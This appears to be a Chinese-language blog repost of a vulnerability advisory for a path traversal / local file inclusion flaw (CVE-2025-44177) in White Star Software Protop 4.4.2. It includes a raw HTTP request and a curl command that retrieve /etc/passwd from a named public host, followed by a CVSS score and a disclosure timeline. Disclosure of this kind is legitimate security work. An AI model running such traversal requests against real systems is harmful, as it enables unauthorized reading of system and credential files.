White Star Software Protop 4.4.2-2024-11-27 本地文件包含漏洞(LFI)分析与利用

本文详细分析了White Star Software Protop 4.4.2-2024-11-27版本中的本地文件包含漏洞(LFI),包括漏洞描述、利用方法、curl命令示例、CVSS评分及披露时间线,适用于安全研究人员和渗透测试人员参考。

漏洞标题:White Star Software Protop 4.4.2-2024-11-27 - 本地文件包含(LFI)

日期:2025-07-09

漏洞作者:Imraan Khan (Lich-Sec)

厂商主页:https://wss.com/

软件链接:https://client.protop.co.za/

版本:v4.4.2-2024-11-27

测试环境:Ubuntu 22.04 / Linux

CVE:CVE-2025-44177

CWE:CWE-22 - 路径遍历

描述:

White Star Software Protop v4.4.2 中存在一个本地文件包含漏洞。 未经身份验证的远程攻击者可以通过在 /pt3upd/ 端点中使用 URL 编码的遍历序列来检索任意文件。

易受攻击的端点:

GET /pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1 Host: client.protop.co.za User-Agent: curl/8.0 Accept: /

示例 curl 命令:

curl -i ‘https://client.protop.co.za/pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd'

  • 在测试时,漏洞在公共实例上得到确认。
  • CVSS v3.1 基础评分:8.2 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N)
  • 已通知厂商并发布了修复程序。

披露时间线:

  • 发现:2025-03-13
  • 向厂商披露:2025-03-20
  • CVE 分配:2025-07-01
  • 公开披露:2025-07-09
comments powered by Disqus
© 2020 - 2025 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次